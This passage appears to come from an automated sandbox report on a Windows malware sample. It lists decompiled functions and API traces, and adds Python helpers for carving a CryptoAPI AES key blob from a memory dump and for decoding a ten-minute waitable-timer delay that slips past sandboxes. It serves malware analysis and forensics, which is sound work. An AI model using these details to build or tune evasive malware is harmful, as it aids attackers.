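PROV_RSA_AES = 0x18               # CryptAcquireContextW dwProvType
CRYPT_VERIFYCONTEXT = 0xF0000000  # CryptAcquireContextW dwFlags: no persistent key container
KP_IV = 1                         # CryptSetKeyParam dwParam: only meaningful for a block cipher in a chaining mode
PLAINTEXTKEYBLOB = 0x08           # BLOBHEADER.bType
CUR_BLOB_VERSION = 0x02           # BLOBHEADER.bVersion
CALG_AES_128 = 0x660E             # assumption: the page only shows the blob size, not the ALG_ID
BLOBHEADER_LEN = 8                # bType, bVersion, reserved, aiKeyAlg
PLAINTEXT_HDR_LEN = BLOBHEADER_LEN + 4  # plus DWORD dwKeySize


def build_plaintext_key_blob(key: bytes, alg_id: int = CALG_AES_128) -> bytes:
    """Serialise a PLAINTEXTKEYBLOB in the layout CryptImportKey consumes."""
    if not key:
        raise ValueError("empty key")
    return struct.pack("<BBHII", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Inverse of build_plaintext_key_blob, with the header checks CryptImportKey applies."""
    if len(blob) < PLAINTEXT_HDR_LEN:
        raise ValueError("blob shorter than BLOBHEADER + dwKeySize")
    btype, bver, _reserved, alg_id, key_len = struct.unpack_from("<BBHII", blob, 0)
    if btype != PLAINTEXTKEYBLOB or bver != CUR_BLOB_VERSION:
        raise ValueError("not a version-2 PLAINTEXTKEYBLOB")
    if PLAINTEXT_HDR_LEN + key_len != len(blob):
        raise ValueError("dwKeySize does not match the blob length")
    return {"alg_id": alg_id, "key": blob[PLAINTEXT_HDR_LEN:]}


def key_length_from_blob_size(blob_size: int) -> int:
    """What the dwDataLen of a CryptImportKey call says about the key: 0x1C -> 16 bytes."""
    if blob_size < PLAINTEXT_HDR_LEN:
        raise ValueError("too small to be a PLAINTEXTKEYBLOB")
    return blob_size - PLAINTEXT_HDR_LEN
```

When reproducing this call chain from a hook or a debugger, `parse_plaintext_key_blob` on the buffer handed to CryptImportKey yields the raw key and the provider-specific ALG_ID in one step; the IV that follows in CryptSetKeyParam(KP_IV) is then the second input needed to decrypt the sample's data offline.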

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD489B
                                                              • Part of subcall function 00DD3FAB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DD48AF,00000001,00DD72E3,00000000), ref: 00DD3FE3
                                                              • Part of subcall function 00DD3FAB: memcpy.NTDLL(00DD48AF,00DD72E3,00000010,?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000), ref: 00DD3FFC
                                                              • Part of subcall function 00DD3FAB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DD4025
                                                              • Part of subcall function 00DD3FAB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DD403D
                                                              • Part of subcall function 00DD3FAB: memcpy.NTDLL(00000000,00000000,039C9630,00000010), ref: 00DD408F
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                            • String ID:
                                                            • API String ID: 894908221-0
                                                            • Opcode ID: 566c03a11213240106f8624beda3f660faf490932b661c9623f5a0358a7ad946
                                                            • Instruction ID: c9053436e48c893da89a984193efa5bd9870ce63f5ea22c5bab8e01d578c46ae
                                                            • Opcode Fuzzy Hash: 566c03a11213240106f8624beda3f660faf490932b661c9623f5a0358a7ad946
                                                            • Instruction Fuzzy Hash: 56F03A36100108BBCB116F95DC40DEB3BADEF853A4B048023F909CA210DB31DA559BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
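
                                                            The CryptAcquireContextW / CryptImportKey / CryptSetKeyParam sequence in the API list above is the standard CryptoAPI pattern for loading a raw symmetric key: provider type 0x18 is PROV_RSA_AES, flag 0xF0000000 is CRYPT_VERIFYCONTEXT, the 0x1C-byte blob handed to CryptImportKey is exactly the size of a PLAINTEXTKEYBLOB carrying a 16-byte key (12-byte header plus key), and the CryptSetKeyParam with parameter 1 is KP_IV. The Python below is an added example, not code from the report or from the sample: it builds and parses that blob layout so the key can be lifted from a memory dump at the CryptImportKey call site and checked for consistency. The key bytes are constructed stand-ins, and the assumption that the blob is a PLAINTEXTKEYBLOB (bType 8) is an inference from its size, since the report does not show the blob contents.

```python
"""Build and parse CryptoAPI PLAINTEXTKEYBLOBs (added example; key bytes are constructed)."""
import struct
from dataclasses import dataclass

# Constants from wincrypt.h
PLAINTEXTKEYBLOB = 0x08      # BLOBHEADER.bType for a raw symmetric key
CUR_BLOB_VERSION = 0x02      # BLOBHEADER.bVersion
CALG_AES_128, CALG_AES_192, CALG_AES_256, CALG_RC4 = 0x660E, 0x660F, 0x6610, 0x6801
ALG_NAMES = {CALG_AES_128: "AES-128", CALG_AES_192: "AES-192",
             CALG_AES_256: "AES-256", CALG_RC4: "RC4"}
AES_KEY_SIZES = {CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}

# BLOBHEADER (bType, bVersion, reserved, aiKeyAlg) followed by the DWORD key length
HEADER = struct.Struct("<BBHII")   # 12 bytes, little-endian


@dataclass(frozen=True)
class PlaintextKeyBlob:
    alg_id: int
    key: bytes

    @property
    def alg_name(self) -> str:
        return ALG_NAMES.get(self.alg_id, f"CALG 0x{self.alg_id:04X}")


def key_len_from_blob_size(cb_data: int) -> int:
    """Key length implied by CryptImportKey's dwDataLen, assuming a PLAINTEXTKEYBLOB."""
    if cb_data < HEADER.size:
        raise ValueError("blob shorter than BLOBHEADER + key length")
    return cb_data - HEADER.size


def build_plaintext_key_blob(alg_id: int, key: bytes) -> bytes:
    """Serialise a raw key the way CryptImportKey expects it."""
    expected = AES_KEY_SIZES.get(alg_id)
    if expected is not None and len(key) != expected:
        raise ValueError(f"{ALG_NAMES[alg_id]} needs a {expected}-byte key")
    return HEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> PlaintextKeyBlob:
    """Validate header fields and length consistency before trusting the key bytes."""
    if len(blob) < HEADER.size:
        raise ValueError("blob shorter than BLOBHEADER + key length")
    b_type, b_version, _reserved, alg_id, cb_key = HEADER.unpack_from(blob)
    if b_type != PLAINTEXTKEYBLOB:
        raise ValueError(f"bType 0x{b_type:02X} is not PLAINTEXTKEYBLOB")
    if b_version != CUR_BLOB_VERSION:
        raise ValueError(f"unexpected bVersion {b_version}")
    if HEADER.size + cb_key != len(blob):
        raise ValueError("cbKey does not match blob size")
    expected = AES_KEY_SIZES.get(alg_id)
    if expected is not None and cb_key != expected:
        raise ValueError(f"{ALG_NAMES[alg_id]} key must be {expected} bytes, got {cb_key}")
    return PlaintextKeyBlob(alg_id, blob[HEADER.size:HEADER.size + cb_key])


# Constructed sample: not the key used by this sample, only a stand-in of the right size.
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_BLOB = build_plaintext_key_blob(CALG_AES_128, SAMPLE_KEY)

if __name__ == "__main__":
    parsed = parse_plaintext_key_blob(SAMPLE_BLOB)
    print(f"{len(SAMPLE_BLOB):#x}-byte blob -> {parsed.alg_name}, key {parsed.key.hex()}")
    print("dwDataLen 0x1C implies a", key_len_from_blob_size(0x1C), "byte key")
```

                                                            When carving the blob from the dump, read 0x1C bytes at the second argument of the CryptImportKey call and run parse_plaintext_key_blob over them; a bType other than 8 or a length mismatch means the buffer is not the blob the sample imported.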

                                                            C-Code - Quality: 100%
                                                            			E00DD2A5C(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                            				void* _t17;
                                                            
                                                            				if(_a4 == 0) {
                                                            					L2:
                                                            					/* Passes the wide-string argument on with a length derived from lstrlenW;
                                                            					   _t14 is a decompiler temporary that the listing leaves undeclared. */
                                                            					return E00DD31ED(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                            				}
                                                            				_t17 = E00DD5A8D(_a4, _a8, _a12, _a16, _a20); // executed; wraps its argument in a BSTR (SysAllocString/SysFreeString in the API list)
                                                            				if(_t17 != 0) {
                                                            					goto L2;
                                                            				}
                                                            				return _t17;
                                                            			}




                                                            Statement addresses: 0x00dd2a64, 0x00dd2a7e, 0x00000000, 0x00dd2a9a, 0x00dd2a75, 0x00dd2a7c, 0x00000000, 0x00000000, 0x00dd2aa1

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00DD5CC3,3D00DD90,80000002,00DD17B3,00DD462D,74666F53,4D4C4B48,00DD462D,?,3D00DD90,80000002,00DD17B3,?), ref: 00DD2A81
                                                              • Part of subcall function 00DD5A8D: SysAllocString.OLEAUT32(00DD462D), ref: 00DD5AA7
                                                              • Part of subcall function 00DD5A8D: SysFreeString.OLEAUT32(00000000), ref: 00DD5AE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$AllocFreelstrlen
                                                            • String ID:
                                                            • API String ID: 3808004451-0
                                                            • Opcode ID: 0b5192e295f1c7c3c5edd455fb4ccf9ea4ce4a33d3af913ddc9e73feb42a5576
                                                            • Instruction ID: 72af8c1ad06f747a07f34b16297dd0d351c0e2db98dcb0a626c44663053ac0ae
                                                            • Opcode Fuzzy Hash: 0b5192e295f1c7c3c5edd455fb4ccf9ea4ce4a33d3af913ddc9e73feb42a5576
                                                            • Instruction Fuzzy Hash: 9CF0923200020EBFDF129F90ED06EAA3F6AEB18394F048016FA1454171D733D9B1EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD3AFD(void* __edi, void* _a4) {
                                                            				int _t7;
                                                            				int _t12;
                                                            
                                                            				_t7 = E00DD642D(__edi, _a4,  &_a4); // executed; returns a length and hands a buffer back through &_a4
                                                            				_t12 = _t7;
                                                            				if(_t12 != 0) {
                                                            					memcpy(__edi, _a4, _t12);          // copy the result into the caller's buffer
                                                            					 *((char*)(__edi + _t12)) = 0;     // NUL-terminate it
                                                            					E00DD77EC(_a4);                    // release the temporary buffer (RtlFreeHeap in the API list)
                                                            				}
                                                            				return _t12;
                                                            			}





                                                            Statement addresses: 0x00dd3b09, 0x00dd3b0e, 0x00dd3b12, 0x00dd3b19, 0x00dd3b24, 0x00dd3b28, 0x00dd3b28, 0x00dd3b31

                                                            APIs
                                                              • Part of subcall function 00DD642D: memcpy.NTDLL(00000000,00000110,00DD6E08,00DD6E08,?,?,00DD6E08,?,?,00DD308E,?), ref: 00DD6463
                                                              • Part of subcall function 00DD642D: memset.NTDLL ref: 00DD64D9
                                                              • Part of subcall function 00DD642D: memset.NTDLL ref: 00DD64ED
                                                            • memcpy.NTDLL(00DD6E08,00DD6E08,00000000,00DD6E08,00DD6E08,00DD6E08,?,?,00DD308E,?,?,00DD6E08,?), ref: 00DD3B19
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memcpymemset$FreeHeap
                                                            • String ID:
                                                            • API String ID: 3053036209-0
                                                            • Opcode ID: c990e5be19a3788a9782e72d6896d24fb24d3bbf1cdae018effcba34c0a97c3f
                                                            • Instruction ID: 07810fb1891aff528c013733c1c5ecf2044f0a9a94e59af72a0f90c882cc6ed2
                                                            • Opcode Fuzzy Hash: c990e5be19a3788a9782e72d6896d24fb24d3bbf1cdae018effcba34c0a97c3f
                                                            • Instruction Fuzzy Hash: 5CE0EC7B50652976CB122A95EC01DEB7F5CDF557A1F044026FE089A301E621DA5097F2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 0457AB4B
                                                              • Part of subcall function 0457AB7B: RegOpenKeyExA.KERNELBASE(0457AB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0457AB63,80000001,?,045722F6), ref: 0457ABC2
                                                              • Part of subcall function 0457AB7B: RegOpenKeyExA.ADVAPI32(0457AB63,0457AB63,00000000,00020019,80000001,?,0457AB63,80000001,?,045722F6), ref: 0457ABD8
                                                              • Part of subcall function 0457AB7B: RegCloseKey.ADVAPI32(80000001,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457AC21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closememset
                                                            • String ID:
                                                            • API String ID: 1685373161-0
                                                            • Opcode ID: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction ID: 6958c64099c839e2e79db145e0f92dcc5ba66753f0887fad4307b51614bdd9bf
                                                            • Opcode Fuzzy Hash: 46a99e365879f98ae64d2ed241524f99d48c88efaf328cef4fa05b518c3bdc40
                                                            • Instruction Fuzzy Hash: 80E0EC30240109BBEB01AE54E841F9D7756BB54758F108026BE0D5A251DAB1BA60EA91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C,?,00000318), ref: 04561687
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 5e0ad03da19f3bbee70feb63f7d688078e45a922c460181adb44ba2567e2ac3d
                                                            • Instruction ID: b2a22721af0a5482f1aa6aa30bb1b7b02930c6d14b3cb6dc7596b7bd6229975b
                                                            • Opcode Fuzzy Hash: 5e0ad03da19f3bbee70feb63f7d688078e45a922c460181adb44ba2567e2ac3d
                                                            • Instruction Fuzzy Hash: 11D01734D00629EBCB609FA5D8869AEFB70BF08710F608228E46173190CB302D15DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            APIs
                                                              • Part of subcall function 0457878B: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 045787BF
                                                              • Part of subcall function 0457878B: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04578880
                                                              • Part of subcall function 0457878B: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578889
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 04572CA5
                                                              • Part of subcall function 0456CDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                              • Part of subcall function 0456CDCB: CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                              • Part of subcall function 0456CDCB: GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 0456CDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                              • Part of subcall function 0456CDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
                                                              • Part of subcall function 0456CDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 04572D08
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04572D85
                                                            • WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 04572E2A
                                                              • Part of subcall function 04583C78: RtlAllocateHeap.NTDLL(00000000,00000010,73BCF730), ref: 04583C9A
                                                              • Part of subcall function 04583C78: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,04572CDE,?), ref: 04583CC8
                                                            • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 04572E5F
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572E6E
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04572E9B
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04572EB5
                                                            • _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 04572EFD
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 04572F17
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04572F2D
                                                            • ReleaseMutex.KERNEL32(?), ref: 04572F4A
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572F5B
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04572F6A
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04572F9E
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04572FB8
                                                            • SwitchToThread.KERNEL32 ref: 04572FBA
                                                            • ReleaseMutex.KERNEL32(?), ref: 04572FC4
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04573002
                                                              • Part of subcall function 0457DC0F: RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 0457DC2D
                                                              • Part of subcall function 0457DC0F: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0457DC5B
                                                              • Part of subcall function 0457DC0F: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0457DC6D
                                                              • Part of subcall function 0457DC0F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0457DC92
                                                              • Part of subcall function 0457DC0F: HeapFree.KERNEL32(00000000,00000000), ref: 0457DCAD
                                                              • Part of subcall function 0457DC0F: RegCloseKey.ADVAPI32(?), ref: 0457DCB7
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457300D
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04573030
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0457304A
                                                            • SwitchToThread.KERNEL32 ref: 0457304C
                                                            • ReleaseMutex.KERNEL32(?), ref: 04573056
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457306B
                                                            • CloseHandle.KERNEL32(?), ref: 045730B9
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730CD
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730D9
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730E5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730F1
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 045730FD
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04573109
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04573115
                                                            • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04573124
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
                                                            • String ID:
                                                            • API String ID: 3804754466-0
                                                            • Opcode ID: 6544067f8701f6b89d3839cc51b2bfd68e1fba4a7ad5a7afac7f59bd12a755cf
                                                            • Instruction ID: 8034fb6a478ab31f86b664da427859b7fa05ddf839c3ecf1229f543851994f56
                                                            • Opcode Fuzzy Hash: 6544067f8701f6b89d3839cc51b2bfd68e1fba4a7ad5a7afac7f59bd12a755cf
                                                            • Instruction Fuzzy Hash: 02328B725047059FD721DF29E88096AB7E9FF88364F040A2DF99693260EB35FC45EB11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
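
                                                            The repeated _allmul followed by SetWaitableTimer in the listing above is the usual way to arm a relative waitable timer: _allmul multiplies a 64-bit count by the constant FF676980 (sign-extended, -10,000,000), which converts seconds into the negative 100-nanosecond units SetWaitableTimer expects for a relative due time. The one call with an explicit count, _allmul(00000258,00000000,FF676980,000000FF), therefore arms a 0x258 = 600 second (ten minute) wait; the other _allmul calls take a runtime value. The Python below is an added example, not code from the report: it emulates _allmul on the dword pairs as the report prints them and interprets the product the way the kernel does. It assumes the report prints 0xFFFFFFFF as 000000FF (the INFINITE timeouts passed to WaitForMultipleObjects in the same listing are shown the same way) and widens that token only where the low dword is negative, so an ordinary small high dword is left alone.

```python
"""Decode _allmul/SetWaitableTimer timings from Joe Sandbox API lines (added example)."""
import re
from datetime import datetime, timedelta, timezone

MASK64 = (1 << 64) - 1
TICKS_PER_SECOND = 10_000_000            # SetWaitableTimer due time is in 100 ns units
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

ALLMUL_RE = re.compile(r"_allmul\.NTDLL\(((?:[0-9A-Fa-f]{8},){3}[0-9A-Fa-f]{8})\)")


def to_signed64(value: int) -> int:
    """Reinterpret a 64-bit pattern as a signed integer."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value


def allmul(a_lo: int, a_hi: int, b_lo: int, b_hi: int) -> int:
    """Emulate ntdll!_allmul: signed 64-bit multiply of two (lo, hi) pairs, truncated to 64 bits."""
    a = to_signed64((a_hi << 32) | a_lo)
    b = to_signed64((b_hi << 32) | b_lo)
    return (a * b) & MASK64


def widen_report_dword(lo: int, hi: int) -> int:
    """Assumption: the report renders 0xFFFFFFFF as 000000FF. Only widen when the low
    dword has its sign bit set, i.e. when 0xFFFFFFFF would be its sign extension."""
    if hi == 0xFF and lo & 0x8000_0000:
        return 0xFFFFFFFF
    return hi


def parse_allmul_call(line: str):
    """Return (a_lo, a_hi, b_lo, b_hi) from a four-argument _allmul line, or None."""
    m = ALLMUL_RE.search(line)
    if not m:
        return None
    a_lo, a_hi, b_lo, b_hi = (int(x, 16) for x in m.group(1).split(","))
    return a_lo, widen_report_dword(a_lo, a_hi), b_lo, widen_report_dword(b_lo, b_hi)


def interpret_due_time(due_time: int):
    """Negative pDueTime is relative (seconds from now); non-negative is an absolute FILETIME."""
    v = to_signed64(due_time)
    if v < 0:
        return "relative", -v / TICKS_PER_SECOND
    return "absolute", FILETIME_EPOCH + timedelta(microseconds=v // 10)


def timer_seconds_from_report(line: str):
    """Full pipeline for a report line: parse, multiply like _allmul, interpret as a due time."""
    args = parse_allmul_call(line)
    if args is None:
        return None
    return interpret_due_time(allmul(*args))


# Constructed from the API line in the listing; the three-argument lines carry a runtime count.
SAMPLE_LINE = "_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 04572EFD"

if __name__ == "__main__":
    print(parse_allmul_call(SAMPLE_LINE))
    print(timer_seconds_from_report(SAMPLE_LINE))
```

                                                            A relative due time of 600 seconds between WaitForMultipleObjects calls is the kind of fixed delay that a sandbox with a short analysis window never sees expire, which is one reason the surrounding code is listed under Non-executed Functions.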

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 04563078: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 0456308F
                                                              • Part of subcall function 04563078: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 045630A9
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                            • memset.NTDLL ref: 04580C65
                                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                            • lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                            • lstrlenW.KERNEL32(?), ref: 04580CC0
                                                            • memset.NTDLL ref: 04580CE3
                                                            • wcscpy.NTDLL ref: 04580CF5
                                                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                            • FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                            • FindClose.KERNEL32(?), ref: 04580DAC
                                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                            • lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • FindNextFileW.KERNEL32(?,00000000), ref: 04580E58
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04580E6A
                                                            • FindClose.KERNEL32(?), ref: 04580E85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                            • String ID:
                                                            • API String ID: 2962561936-0
                                                            • Opcode ID: b46245119e2dce116eebdbf76ad6adcdfd2044b6da62df068b84cf99b7b54f1a
                                                            • Instruction ID: 4ace4ff292b905ffd2919461e7984bb16fc1e280e3f0d48c15f8e87d257fbfa7
                                                            • Opcode Fuzzy Hash: b46245119e2dce116eebdbf76ad6adcdfd2044b6da62df068b84cf99b7b54f1a
                                                            • Instruction Fuzzy Hash: AD816CB1504306AFD751BF24DC84A1BBBE8FF94B04F45482DF896A6192DF74E808EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457468E
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045746C0
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045746F2
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574724
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574756
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574788
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045747BA
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045747EC
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457481E
